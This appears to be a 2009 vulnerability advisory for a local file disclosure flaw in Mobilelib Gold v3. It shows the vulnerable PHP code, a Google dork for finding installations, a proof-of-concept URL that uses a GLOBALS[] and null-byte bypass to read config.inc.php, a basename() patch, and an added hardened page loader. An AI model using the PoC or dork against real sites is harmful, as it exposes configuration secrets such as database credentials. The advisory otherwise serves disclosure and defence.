# Title : Mobilelib Gold v3 Local File Disclosure Vulnerability
# Published : 2009-07-14
# Author : Qabandi
By Qabandi
From Kuwait, PEACE...
iqa[a]hotmail.fr
=Vuln: Mobilelib Gold v3 Local File Disclosure Vulnerability
=INFO: http://www.ac4p.com/
=BUY: http://www.ac4p.com/
=Download: ~~~
=DORK: intext:"English for dummies"
____________
_-=/:Conditions:=-_
````````````````````````````````````````````````````````````````````````````````
Magic_quotes MUST BE ON :)
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"
function getthememyhtml($page)
{
    // $page goes into the path unchecked, so "../" sequences are honoured
    if (file_exists("./myhtmlpages/".$page.".html")) {
        $templat="./myhtmlpages/".$page.".html";
        $tempindex=@fopen($templat,"r");
        $html=@fread($tempindex,@filesize($templat));
        @fclose($tempindex);
    } else {
        // fallback message shown when the page file does not exist
        $html ='<p align="center"> ???£ ?-?“?????? ?…?-?????? ?£???? ????????????.</p>';
    }
    return $html;
}
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:=-_
````````````````````````````````````````````````````````````````````````````````
The script takes all _GET variables and scans them for harmful sequences
such as the null char (%00), etc.
That check is bypassed with an old GLOBALS[] trick ;)
http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"
function getthememyhtml($page)
{
    $page = basename($page); //<---- Added the good old Basename func ;)
    // after basename() only the last path component is left, so "../" is gone
    if (file_exists("./myhtmlpages/".$page.".html")) {
        $templat="./myhtmlpages/".$page.".html";
        $tempindex=@fopen($templat,"r");
        $html=@fread($tempindex,@filesize($templat));
        @fclose($tempindex);
    } else {
        // fallback message shown when the page file does not exist
        $html ='<p align="center"> ???£ ?-?“?????? ?…?-?????? ?£???? ????????????.</p>';
    }
    return $html;
}
---------------------------------------===--------------------------------------
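Added example, not part of the original advisory and not Mobilelib Gold code: a stricter page loader that goes beyond the basename() fix with an allowlist and a realpath() containment check, plus a guard that rejects parameters named after superglobals (the route the P.o.C request uses). Only the "myhtmlpages" directory name comes from the advisory; the function and constant names are hypothetical, and PHP 7.1 or later is assumed.

```php
<?php
// Added example; names are hypothetical, only "myhtmlpages" is from the advisory.
const PAGE_DIR = __DIR__ . '/myhtmlpages';
const RESERVED = ['GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                  '_SERVER', '_FILES', '_ENV', '_SESSION'];

// True when a request parameter is named after a superglobal, as in the
// advisory's GLOBALS[page] request. PHP parses that as $_GET['GLOBALS'].
function has_reserved_param(array $input): bool
{
    foreach (RESERVED as $name) {
        if (array_key_exists($name, $input)) {
            return true;
        }
    }
    return false;
}

// Returns the page HTML, or null when the name is invalid or the file is absent.
function load_static_page($page): ?string
{
    if (!is_string($page)) {            // ?page[]=x arrives as an array
        return null;
    }
    // Allowlist: "/", "\", "." and NUL bytes cannot pass this pattern.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page) !== 1) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $page . '.html');
    if ($base === false || $path === false) {
        return null;                    // directory or page file missing
    }
    // Containment check after symlinks are resolved.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    $html = file_get_contents($path);
    return $html === false ? null : $html;
}

if (has_reserved_param($_GET) || has_reserved_param($_POST) || has_reserved_param($_COOKIE)) {
    http_response_code(400);
    exit;
}
// Read the parameter explicitly instead of relying on extracted globals.
$html = load_static_page($_GET['page'] ?? null);
if ($html === null) { http_response_code(404); exit; }
echo $html;
```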
Salamz to All Muslim Hackers.